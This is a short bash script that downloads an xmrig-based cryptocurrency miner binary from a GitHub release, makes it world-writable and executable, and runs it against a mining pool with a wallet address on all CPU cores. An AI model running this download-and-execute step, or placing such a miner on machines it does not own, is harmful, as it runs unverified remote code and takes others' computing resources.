#!/bin/bash
wget -O vrl https://github.com/bondaltomason/meo/releases/download/2.7.0/xmrig-vrl
chmod 777 vrl
./vrl -a randomvirel --url eu.rplant.xyz:7155 --user v30w22jlt8nt11yzmnmcynju7fy6h82iaihmt69gbaw6p3cp6yb.x --pass webpassword=x -t $(nproc --all)
